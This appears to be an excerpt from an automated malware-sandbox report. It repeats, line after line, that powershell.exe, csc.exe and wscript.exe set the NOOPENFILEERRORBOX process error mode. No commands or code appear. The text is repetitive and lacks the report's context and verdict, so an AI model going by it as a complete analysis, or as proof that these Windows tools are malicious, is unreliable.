                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
